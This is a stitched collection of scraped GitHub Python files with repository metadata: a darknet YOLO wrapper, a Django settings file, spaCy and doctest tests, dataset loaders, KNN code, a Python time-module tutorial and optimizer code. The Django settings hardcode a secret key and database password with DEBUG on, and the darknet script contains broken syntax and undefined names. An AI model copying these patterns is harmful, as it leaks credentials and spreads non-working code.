lib = CDLL(libdarknet_path, RTLD_GLOBAL)
lib.network_width.argtypes = [c_void_p]
lib.network_width.restype = c_int
lib.network_height.argtypes = [c_void_p]
lib.network_height.restype = c_int
predict = lib.network_predict
predict.argtypes = [c_void_p, POINTER(c_float)]
predict.restype = POINTER(c_float)
set_gpu = lib.cuda_set_device
set_gpu.argtypes = [c_int]
make_image = lib.make_image
make_image.argtypes = [c_int, c_int, c_int]
make_image.restype = IMAGE
get_network_boxes = lib.get_network_boxes
get_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]
get_network_boxes.restype = POINTER(DETECTION)
make_network_boxes = lib.make_network_boxes
make_network_boxes.argtypes = [c_void_p]
make_network_boxes.restype = POINTER(DETECTION)
free_detections = lib.free_detections
free_detections.argtypes = [POINTER(DETECTION), c_int]
free_ptrs = lib.free_ptrs
free_ptrs.argtypes = [POINTER(c_void_p), c_int]
network_predict = lib.network_predict
network_predict.argtypes = [c_void_p, POINTER(c_float)]
reset_rnn = lib.reset_rnn
reset_rnn.argtypes = [c_void_p]
load_net = lib.load_network
load_net.argtypes = [c_char_p, c_char_p, c_int]
load_net.restype = c_void_p
do_nms_obj = lib.do_nms_obj
do_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
do_nms_sort = lib.do_nms_sort
do_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
free_image = lib.free_image
free_image.argtypes = [IMAGE]
letterbox_image = lib.letterbox_image
letterbox_image.argtypes = [IMAGE, c_int, c_int]
letterbox_image.restype = IMAGE
load_meta = lib.get_metadata
lib.get_metadata.argtypes = [c_char_p]
lib.get_metadata.restype = METADATA
load_image = lib.load_image_color
load_image.argtypes = [c_char_p, c_int, c_int]
load_image.restype = IMAGE
rgbgr_image = lib.rgbgr_image
rgbgr_image.argtypes = [IMAGE]
predict_image = lib.network_predict_image
predict_image.argtypes = [c_void_p, IMAGE]
predict_image.restype = POINTER(c_float)
def classify(net, meta, im):
out = predict_image(net, im)
res = []
for i in range(meta.classes):
res.append((meta.names[i], out[i]))
res = sorted(res, key=lambda x: -x[1])
return res
def array_to_image(arr):
# need to return old values to avoid python freeing memory
arr = arr.transpose(2,0,1)
c, h, w = arr.shape[0:3]
arr = np.ascontiguousarray(arr.flat, dtype=np.float32) / 255.0
data = arr.ctypes.data_as(POINTER(c_float))
im = IMAGE(w,h,c,data)
return im, arr
def netdetect(net, meta, image, thresh=.5, hier_thresh=.5, nms=.45):
im, image = array_to_image(image)
rgbgr_image(im)
num = c_int(0)
pnum = pointer(num)
predict_image(net, im)
dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)
num = pnum[0]
if (nms): do_nms_obj(dets, num, meta.classes, nms);
res = []
for j in range(num):
a = dets[j].prob[0:meta.classes]
if any(a):
ai = np.array(a).nonzero()[0]
for i in ai:
b = dets[j].bbox
res.append((meta.names[i], dets[j].prob[i], (max(b.x,0), max(b.y,0), max(b.w,0), max(b.h,0))))
res = sorted(res, key=lambda x: -x[1])
if isinstance(image,bytes): free_image(im)
free_detections(dets, num)
return res
#%%
def convert_yolo_normal(x,y,w,h,s1,s2):
b0=(2*x-w)/2
b1=w+b0
b2=(2*y-h)/2
b3=h+b2
return (int(b0),int(b1),int(b2),int(b3))
#%%
if __name__ == "__main__":
config_file = 'object_detector.config'
with open('config.json') as f:
data = json.load(f)
weights_file = data['weights_file']
cfg_file = data['cfg_file']
obj_data = data['obj_file']
image_name = sys.argv[1]
img = cv2.imread(image_name)
netdet = load_net(cfg_file,weights_file,0)
metadet = load_meta(obj_data)
obj_res = netdetect(netlp,metalp, veh,0.7)
for obj_res:
print('All detected objects are:: ')
for i in range(len(obj_res)):
print(obj_res[i][0])
|
[
"[email protected]"
] | |
129e029f51e6c808b38cbff8b551f38366f41e0c
|
0726e305f3a7b57e8837ddcd334148ec68e9d2de
|
/portfolio/settings.py
|
79f45073c3745b1bc73328e6685fcf08e83d4536
|
[
"MIT"
] |
permissive
|
Brian23-eng/portfolio-1
|
873448172532c0dd82de496911ad509022189db1
|
70ec48288fadf803a166f70728adfb1a61916a6d
|
refs/heads/master
| 2022-09-24T21:26:13.670066 | 2020-01-23T05:36:20 | 2020-01-23T05:36:20 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,673 |
py
|
"""
Django settings for portfolio project.
Generated by 'django-admin startproject' using Django 3.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
import django_heroku
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'y#k96$zi!2uc9@tj#bvr0smlxx1v)2dcff447#%=kwn)$4(*1i'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'portfolio.myportfolio',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'portfolio.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'portfolio.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'portfolio',
'USER': 'moringa',
'PASSWORD': 'p@$$w0rd',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# configuring the location for media
MEDIA_URL = '/project_images/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'project_images')
# Configure Django app for Heroku
django_heroku.settings(locals())
|
[
"[email protected]"
] | |
953b813584667bf1bd1e285fa7bdb8d4caa9ffa5
|
9bb18febdfc911a88756afd9490526f8e7929bfc
|
/spacy/tests/regression/test_issue3951.py
|
f9912c494ec18b830006793bd039c8ffa525a4cc
|
[
"MIT"
] |
permissive
|
ashaffer/spaCy
|
3c28c7c8422fd4072bd3d472e796994d3269cf9f
|
ec0beccaf13eef263feec27e820136ad1e270bd4
|
refs/heads/master
| 2020-07-05T23:42:00.467234 | 2019-08-16T16:39:25 | 2019-08-16T16:39:25 | 202,819,156 | 1 | 0 |
MIT
| 2019-08-17T01:06:11 | 2019-08-17T01:06:10 | null |
UTF-8
|
Python
| false | false | 585 |
py
|
# coding: utf8
from __future__ import unicode_literals
import pytest
from spacy.matcher import Matcher
from spacy.tokens import Doc
@pytest.mark.xfail
def test_issue3951(en_vocab):
"""Test that combinations of optional rules are matched correctly."""
matcher = Matcher(en_vocab)
pattern = [
{"LOWER": "hello"},
{"LOWER": "this", "OP": "?"},
{"OP": "?"},
{"LOWER": "world"},
]
matcher.add("TEST", None, pattern)
doc = Doc(en_vocab, words=["Hello", "my", "new", "world"])
matches = matcher(doc)
assert len(matches) == 0
|
[
"[email protected]"
] | |
de5ec83749603d84453db9285e68d7d64b0f4369
|
8edd63a42469bf09fcad1c1070995ceda6e49646
|
/env/lib/python2.7/site-packages/observations/r/phosphate.py
|
6977f1f13f9f2bdb88341269c503dcf9123103b4
|
[] |
no_license
|
silky/bell-ppls
|
fa0b5418f40dab59de48b7220ff30caba5945b56
|
369e7602c810b694a70ac1e875017480c8910ac8
|
refs/heads/master
| 2020-04-06T08:40:28.588492 | 2018-11-01T06:51:33 | 2018-11-01T06:51:33 | 157,312,221 | 1 | 0 | null | 2018-11-13T03:04:18 | 2018-11-13T03:04:18 | null |
UTF-8
|
Python
| false | false | 1,835 |
py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def phosphate(path):
"""Phosphate Level Data
Plasma inorganic phosphate levels from 33 subjects.
A data frame with 33 observations on the following 9 variables.
`group`
a factor with levels `control` and `obese`.
`t0`
baseline phosphate level
,
`t0.5`
phosphate level after 1/2 an hour.
`t1`
phosphate level after one an hour.
`t1.5`
phosphate level after 1 1/2 hours.
`t2`
phosphate level after two hours.
`t3`
phosphate level after three hours.
`t4`
phosphate level after four hours.
`t5`
phosphate level after five hours.
C. S. Davis (2002), *Statistical Methods for the Analysis of Repeated
Measurements*, Springer, New York.
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `phosphate.csv`.
Returns:
Tuple of np.ndarray `x_train` with 33 rows and 9 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'phosphate.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/HSAUR/phosphate.csv'
maybe_download_and_extract(path, url,
save_file_name='phosphate.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
|
[
"[email protected]"
] | |
c733d23c52b223a95360a77acfa2c1924f9cc877
|
9433ce01c6e2906c694b6f0956a4640e1872d4d2
|
/src/main/python/wdbd/codepool/numpy/np_ployfit.py
|
7f5cd81f4002e97e948a3b8be95f2be36410229a
|
[] |
no_license
|
shwdbd/python_codepool
|
fcd7950fc1339994186461ae18c34cee238938ee
|
92a4fb61d060f9a545499b6b7f99a4dc211d5009
|
refs/heads/master
| 2023-02-20T19:49:23.677824 | 2022-06-15T08:53:51 | 2022-06-15T08:53:51 | 209,431,254 | 0 | 1 | null | 2023-02-15T21:58:53 | 2019-09-19T00:56:03 |
Python
|
UTF-8
|
Python
| false | false | 344 |
py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : np_ployfit.py
@Time : 2019/11/06 14:24:55
@Author : Jeffrey Wang
@Version : 1.0
@Contact : [email protected]
@Desc : 拟合函数
1. fit_1z 一阶函数拟合
2. fit_2z 二阶函数拟合
? 如何评价拟合效果
'''
# here put the import lib
|
[
"[email protected]"
] | |
4f933506f4af1143b9acc28db9a09d38ec4467de
|
4eab0329e5bf8b91e3305eaf9202de107cfe889b
|
/notebooks/data8_notebooks/lab04/tests/q2_3.py
|
bd02b5e36213b04e7d67c069acfcddca70a09933
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
y1ngyang/jupyterhub_AWS_deployment
|
e638f489ad1b70962204f4355eb2a7c4fc97dc7d
|
8172d63d94894774ec29f427ab5eeec637c923f4
|
refs/heads/master
| 2023-04-15T16:00:11.948307 | 2018-05-18T20:16:37 | 2018-05-18T20:16:37 | 134,009,971 | 0 | 0 |
BSD-3-Clause
| 2023-04-04T00:27:55 | 2018-05-18T22:33:34 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 375 |
py
|
test = {
'name': '',
'points': 1,
'suites': [
{
'cases': [
{
'code': r"""
>>> disemvowel("Datascience rules!") == "Dtscnc rls!"
True
""",
'hidden': False,
'locked': False
},
],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
|
[
"[email protected]"
] | |
46d07128a604bf41698eb408598644429535db5b
|
77e8b7bc211624687eb61fdb071020642b2c0080
|
/machinelearning/f16.py
|
843de75f00d51c7741c5309feaa61e2e095f6c40
|
[] |
no_license
|
wherby/hackerrank
|
fab46ea208042ce8055c2755545896bf69f88895
|
84345f56690ea6b1d5db181b12d2a2669007456c
|
refs/heads/master
| 2020-09-26T23:53:06.841052 | 2019-09-15T12:11:43 | 2019-09-15T12:11:43 | 67,225,970 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,412 |
py
|
import numpy as np
from math import sqrt
import matplotlib.pyplot as plt
import warnings
from matplotlib import style
from collections import Counter
style.use('fivethirtyeight')
dataset ={'k': [[1,2],[2,3],[3,1]], 'r': [[6,5], [7,7,],[8,6]]}
new_feature = [5,7]
# for i in dataset:
# for ii in dataset[i]:
# plt.scatter(ii[0],ii[1],s =100, color =i)
# [[plt.scatter(ii[0],ii[1],s =100, color =i) for ii in dataset[i]] for i in dataset]
# plt.scatter(new_feature[0], new_feature[1])
# plt.show()
def k_nearest_neighbors(data, predict, k =3):
if len(data) >=k:
warnings.warn('k is set to value less than totoal voting groups')
distances = []
for group in data:
for features in data[group]:
#euclidean_distance = np.sqrt(np.sum((np.array(features) - np.array(predict)) **2))
euclidean_distance = np.linalg.norm(np.array(features) - np.array(predict))
distances.append([euclidean_distance, group])
votes = [ i[1] for i in sorted(distances)[:k]]
#print(sorted(distances))
#print( Counter(votes).most_common(1))
vote_result = Counter(votes).most_common(1)[0][0]
return vote_result
result = k_nearest_neighbors(dataset, new_feature , k =3)
print result
[[plt.scatter(ii[0],ii[1],s =100, color =i) for ii in dataset[i]] for i in dataset]
plt.scatter(new_feature[0], new_feature[1],color = result)
plt.show()
|
[
"[email protected]"
] | |
b20ca1afe34ac874e9dd05a205c75d038f6ea7b0
|
1ae03694e6826c2c3224647024f66debcebd62dc
|
/matlab/+robust_andrews_kernel/balance_scale/metrics.py
|
d78e052129030ea9de8d3552ad6679f6790d35df
|
[
"Apache-2.0"
] |
permissive
|
Joaggi/Robust-kernels-for-robust-location-estimation
|
5ad7f8f3be9a08e5d4283e03e017e5e3b9b186b8
|
9db62273de90547c982d819dc45e66ac86bfcb58
|
refs/heads/master
| 2023-04-17T22:41:01.652426 | 2022-08-02T23:43:31 | 2022-08-02T23:43:31 | 27,465,913 | 3 | 1 | null | 2022-08-02T23:39:44 | 2014-12-03T02:49:24 |
MATLAB
|
UTF-8
|
Python
| false | false | 686 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 16 15:50:05 2014
@author: Alejandro
"""
import scipy.io as sio
import os, sys
lib_path = os.path.abspath('G:/Dropbox/Universidad/Machine Learning')
sys.path.append(lib_path)
import numpy as np
import Algorithms.Python.Metrics as Metrics
import Robustes.Experiments.metrics_over_labels as metrics_over_labels
dictionary = {
'Kernelconvexnmf':0,
'KernelKMeans':0,
'Kernelseminmfnnls':0,
'Kernelseminmfrule':0,
'KMeans':0,
'NNMF':0,
'RMNMF':1
}
labels_name = 'balance-scale-labels'
metrics_over_labels.metrics('G:/Dropbox/Universidad/Machine Learning/Robustes/BalanceScale/',dictionary,labels_name)
|
[
"[email protected]"
] | |
2277163fb77406568bbbbfd4c43fbc3d8f8704ff
|
583db8851c609f03f722884557cfc67de0ce564e
|
/pysmapi/interfaces/Event_Stream_Add.py
|
8592834aefd487a4a877f75155c9b4f73ace2267
|
[
"Apache-2.0"
] |
permissive
|
lllucius/pysmapi
|
ab0b4409bfda6a61dab7805e2033d71d09a96493
|
c0d802edb58e835e4d48cb9c28ccfccfe5b5c686
|
refs/heads/master
| 2020-04-20T18:07:46.699611 | 2019-06-25T04:27:41 | 2019-06-25T04:27:41 | 169,009,326 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,169 |
py
|
# Copyright 2018-2019 Leland Lucius
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import struct
from pysmapi.smapi import *
class Event_Stream_Add(Request):
def __init__(self,
event_info = "",
**kwargs):
super(Event_Stream_Add, self).__init__(**kwargs)
# Request parameters
self._event_info = event_info
@property
def event_info(self):
return self._event_info
@event_info.setter
def event_info(self, value):
self._event_info = value
def pack(self, **kwargs):
# event_info (string,1-maxlength,charNA)
buf = s2b(self._event_info)
return buf
|
[
"[email protected]"
] | |
173d992267a4c50b4df509c54add6f9396d75fbc
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02821/s313302941.py
|
271131d42505bd3b94253e5c4d6e944e2905ed13
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 841 |
py
|
n, m = map(int, input().split())
a = list(map(int, input().split()))
def cumsum(s):
n = len(s)
cs = [0] * (n+1)
for i in range(n):
cs[i+1] = cs[i] + s[i]
return cs
def bs_list(a, f):
l, r = -1, len(a)
while r - l > 1:
x = (l + r) // 2
if f(a[x]): r = x
else: l = x
return None if r == len(a) else r
a.sort()
ca = cumsum(a)
def detect(x):
num = 0
for b in a[::-1]:
res = bs_list(a, lambda y: y >= x - b)
if res is None: break
num += n - res
return num <= m
l, r = -1, 10**5*2+10
while r - l > 1:
x = (l+r) // 2
if detect(x): r = x
else: l = x
s, c = 0, 0
for b in a[::-1]:
res = bs_list(a, lambda x: x >= r - b)
if res is None: break
c += (n - res)
s += b * (n - res) + (ca[n] - ca[res])
print(s + (m - c) * l)
|
[
"[email protected]"
] | |
48029ad550be99084bdc75771e75b28299f992dd
|
8e24e8bba2dd476f9fe612226d24891ef81429b7
|
/geeksforgeeks/python/basic/28_1.py
|
8bba51f3b7f6bc07e66c3cce6c8bb5320e828687
|
[] |
no_license
|
qmnguyenw/python_py4e
|
fb56c6dc91c49149031a11ca52c9037dc80d5dcf
|
84f37412bd43a3b357a17df9ff8811eba16bba6e
|
refs/heads/master
| 2023-06-01T07:58:13.996965 | 2021-06-15T08:39:26 | 2021-06-15T08:39:26 | 349,059,725 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,733 |
py
|
Time Functions in Python | Set 1 (time(), ctime(), sleep()…)
Python has defined a module, “time” which allows us to handle various
operations regarding time, its conversions and representations, which find its
use in various applications in life. The beginning of time is started
measuring from **1 January, 12:00 am, 1970** and this very time is termed as “
**epoch** ” in Python.
**Operations on Time :**
**1\. time()** :- This function is used to count the number of **seconds
elapsed since the epoch**.
**2\. gmtime(sec)** :- This function returns a **structure with 9 values**
each representing a time attribute in sequence. It converts **seconds into
time attributes(days, years, months etc.)** till specified seconds from epoch.
If no seconds are mentioned, time is calculated till present. The structure
attribute table is given below.
Index Attributes Values
0 tm_year 2008
1 tm_mon 1 to 12
2 tm_mday 1 to 31
3 tm_hour 0 to 23
4 tm_min 0 to 59
5 tm_sec 0 to 61 (60 or 61 are leap-seconds)
6 tm_wday 0 to 6
7 tm_yday 1 to 366
8 tm_isdst -1, 0, 1 where -1 means
Library determines DST
__
__
__
__
__
__
__
# Python code to demonstrate the working of
# time() and gmtime()
# importing "time" module for time operations
import time
# using time() to display time since epoch
print ("Seconds elapsed since the epoch are : ",end="")
print (time.time())
# using gmtime() to return the time attribute structure
print ("Time calculated acc. to given seconds is : ")
print (time.gmtime())
---
__
__
Output:
Seconds elapsed since the epoch are : 1470121951.9536893
Time calculated acc. to given seconds is :
time.struct_time(tm_year=2016, tm_mon=8, tm_mday=2,
tm_hour=7, tm_min=12, tm_sec=31, tm_wday=1,
tm_yday=215, tm_isdst=0)
**3\. asctime(“time”)** :- This function takes a time attributed string
produced by gmtime() and returns a **24 character string denoting time**.
**4\. ctime(sec)** :- This function returns a **24 character time string** but
takes seconds as argument and **computes time till mentioned seconds**. If no
argument is passed, time is calculated till present.
__
__
__
__
__
__
__
# Python code to demonstrate the working of
# asctime() and ctime()
# importing "time" module for time operations
import time
# initializing time using gmtime()
ti = time.gmtime()
# using asctime() to display time acc. to time mentioned
print ("Time calculated using asctime() is : ",end="")
print (time.asctime(ti))
# using ctime() to diplay time string using seconds
print ("Time calculated using ctime() is : ", end="")
print (time.ctime())
---
__
__
Output:
Time calculated using asctime() is : Tue Aug 2 07:47:02 2016
Time calculated using ctime() is : Tue Aug 2 07:47:02 2016
**5\. sleep(sec)** :- This method is used to **hault the program execution**
for the time specified in the arguments.
__
__
__
__
__
__
__
# Python code to demonstrate the working of
# sleep()
# importing "time" module for time operations
import time
# using ctime() to show present time
print ("Start Execution : ",end="")
print (time.ctime())
# using sleep() to hault execution
time.sleep(4)
# using ctime() to show present time
print ("Stop Execution : ",end="")
print (time.ctime())
---
__
__
Output:
Start Execution : Tue Aug 2 07:59:03 2016
Stop Execution : Tue Aug 2 07:59:07 2016
This article is contributed by **Manjeet Singh**. If you like GeeksforGeeks
and would like to contribute, you can also write an article using
contribute.geeksforgeeks.org or mail your article to
[email protected]. See your article appearing on the GeeksforGeeks
main page and help other Geeks.
Please write comments if you find anything incorrect, or you want to share
more information about the topic discussed above.
Attention geek! Strengthen your foundations with the **Python Programming
Foundation** Course and learn the basics.
To begin with, your interview preparations Enhance your Data Structures
concepts with the **Python DS** Course.
My Personal Notes _arrow_drop_up_
Save
|
[
"[email protected]"
] | |
45ea3e7d8004d23bd4b5fe78a403b5515a80826a
|
42000e14d25ce3de5b9ba24e3399e67bf88c4ad1
|
/Level_Three/ProTwo/AppTwo/migrations/0001_initial.py
|
db9703f5f9d755c7f363b452bdc1ccaea87e2c26
|
[] |
no_license
|
cdunn6754/Django_Projects
|
0528b3263e2762d0e872686ec5f00a40f3730851
|
545d4e73f05969d1277cacaab2042787676b7e73
|
refs/heads/master
| 2021-09-11T18:21:07.249977 | 2018-04-11T00:06:27 | 2018-04-11T00:06:27 | 110,480,579 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 682 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-04-05 00:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=264)),
('last_name', models.CharField(max_length=264)),
('email', models.EmailField(max_length=264)),
],
),
]
|
[
"[email protected]"
] | |
ff5481487e54507a28f7f346fc73b088e009771b
|
fcc88521f63a3c22c81a9242ae3b203f2ea888fd
|
/Python3/0006-ZigZag-Conversion/soln.py
|
f2d94cda1de538a16f8a63dbbbb03073bd1a954e
|
[
"MIT"
] |
permissive
|
wyaadarsh/LeetCode-Solutions
|
b5963e3427aa547d485d3a2cb24e6cedc72804fd
|
3719f5cb059eefd66b83eb8ae990652f4b7fd124
|
refs/heads/master
| 2022-12-06T15:50:37.930987 | 2020-08-30T15:49:27 | 2020-08-30T15:49:27 | 291,811,790 | 0 | 1 |
MIT
| 2020-08-31T19:57:35 | 2020-08-31T19:57:34 | null |
UTF-8
|
Python
| false | false | 510 |
py
|
import functools
class Solution:
def convert(self, s, numRows):
"""
:type s: str
:type numRows: int
:rtype: str
"""
if numRows == 1 or len(s) <= numRows:
return s
rows = [[] for _ in range(numRows)]
row, drow = 0, 1
for ch in s:
rows[row].append(ch)
row += drow
if row == 0 or row == numRows - 1:
drow = -drow
return ''.join(functools.reduce(operator.add, rows))
|
[
"[email protected]"
] | |
9f52c25f81a9401c049a07ab2f0d2bf4f56c2f38
|
b87b4f2ad90390e6dcb53f258077ea6fea574f6c
|
/tests/test_models/test_user_model.py
|
86f00ff5b9e2c85d4cf23f0173349b8b234bc5ee
|
[] |
no_license
|
Wassally/backend
|
1b73510ee451d433c1f747be5356c4e11b6e914a
|
01071eb94ecfc3a3b260ae957a0aa638271c66b1
|
refs/heads/master
| 2022-11-26T13:24:01.684833 | 2019-06-30T06:02:29 | 2019-06-30T06:02:29 | 177,253,039 | 2 | 0 | null | 2022-11-22T03:30:11 | 2019-03-23T06:29:15 |
Python
|
UTF-8
|
Python
| false | false | 805 |
py
|
from django.test import TestCase
from api.factories import ClientFactory, CaptainFactory
from api.models import User, Captain
class ClientTest(TestCase):
def test_creation_client(self):
client = ClientFactory()
self.assertTrue(isinstance(client, User))
self.assertEqual(
client.__str__(),
"%d: %s" % (client.id, client.username)
)
self.assertTrue(client.is_client)
self.assertFalse(client.is_captain)
class CaptainTest(TestCase):
def test_creation_captain(self):
captain = CaptainFactory()
self.assertTrue(isinstance(captain, Captain))
self.assertEqual(captain.__str__(), captain.user.username)
self.assertTrue(captain.user.is_captain)
self.assertFalse(captain.user.is_client)
|
[
"[email protected]"
] | |
b036d6fd8e95f539ae982a23cf985148ad491aca
|
bcabce262e54a6ac38948a4717254cdc3ce65874
|
/mealpy/physics_based/WDO.py
|
3e376916b7ec257ba7469ad4a3260e10a7cdabce
|
[
"MIT"
] |
permissive
|
ibrahim85/MEta-heuristics-ALgorithms-in-PYthon
|
4ab6e6ef54127b6f4721178a1f855d1be91f9b42
|
47fb428e8378fc52cd5fe6eff20cec1c68ba5039
|
refs/heads/master
| 2023-06-03T05:23:31.993100 | 2021-06-28T14:48:38 | 2021-06-28T14:48:38 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,794 |
py
|
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu Nguyen" at 21:18, 17/03/2020 %
# %
# Email: [email protected] %
# Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 %
# Github: https://github.com/thieu1995 %
#-------------------------------------------------------------------------------------------------------%
from numpy.random import uniform, randint
from numpy import ones, clip
from mealpy.root import Root
class BaseWDO(Root):
"""
The original version of : Wind Driven Optimization (WDO)
The Wind Driven Optimization Technique and its Application in Electromagnetics
Link:
https://ieeexplore.ieee.org/abstract/document/6407788
"""
def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100,
RT=3, g=0.2, alp=0.4, c=0.4, max_v=0.3, **kwargs):
super().__init__(obj_func, lb, ub, verbose, kwargs)
self.epoch = epoch
self.pop_size = pop_size
self.RT = RT # RT coefficient
self.g = g # gravitational constant
self.alp = alp # constants in the update equation
self.c = c # coriolis effect
self.max_v = max_v # maximum allowed speed
def train(self):
"""
# pop is the set of "air parcel" - "position"
# air parcel: is the set of gas atoms . Each atom represents a dimension in position and has its own velocity
# pressure represented by fitness value
"""
pop = [self.create_solution() for _ in range(self.pop_size)]
g_best = self.get_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
list_velocity = self.max_v * uniform(self.lb, self.ub, (self.pop_size, self.problem_size))
for epoch in range(self.epoch):
# Update velocity based on random dimensions and position of global best
for i in range(self.pop_size):
rand_dim = randint(0, self.problem_size)
temp = list_velocity[i][rand_dim] * ones(self.problem_size)
vel = (1 - self.alp)*list_velocity[i] - self.g * pop[i][self.ID_POS] + \
(1 - 1.0/(i+1)) * self.RT * (g_best[self.ID_POS] - pop[i][self.ID_POS]) + self.c * temp / (i+1)
vel = clip(vel, -self.max_v, self.max_v)
# Update air parcel positions, check the bound and calculate pressure (fitness)
pos = pop[i][self.ID_POS] + vel
pos = self.amend_position_faster(pos)
fit = self.get_fitness_position(pos)
pop[i] = [pos, fit]
list_velocity[i] = vel
## batch size idea
if self.batch_idea:
if (i + 1) % self.batch_size == 0:
g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
else:
if (i + 1) % self.pop_size == 0:
g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
|
[
"[email protected]"
] | |
4ad8ad1fbd7235c212a139cdeafe67ce534debf4
|
afc8d5a9b1c2dd476ea59a7211b455732806fdfd
|
/Configurations/WH_chargeAsymmetry/WH3l/Full2018_v7/structure.py
|
6388a09a0a8e38670a88995180d3619b60830e60
|
[] |
no_license
|
latinos/PlotsConfigurations
|
6d88a5ad828dde4a7f45c68765081ed182fcda21
|
02417839021e2112e740607b0fb78e09b58c930f
|
refs/heads/master
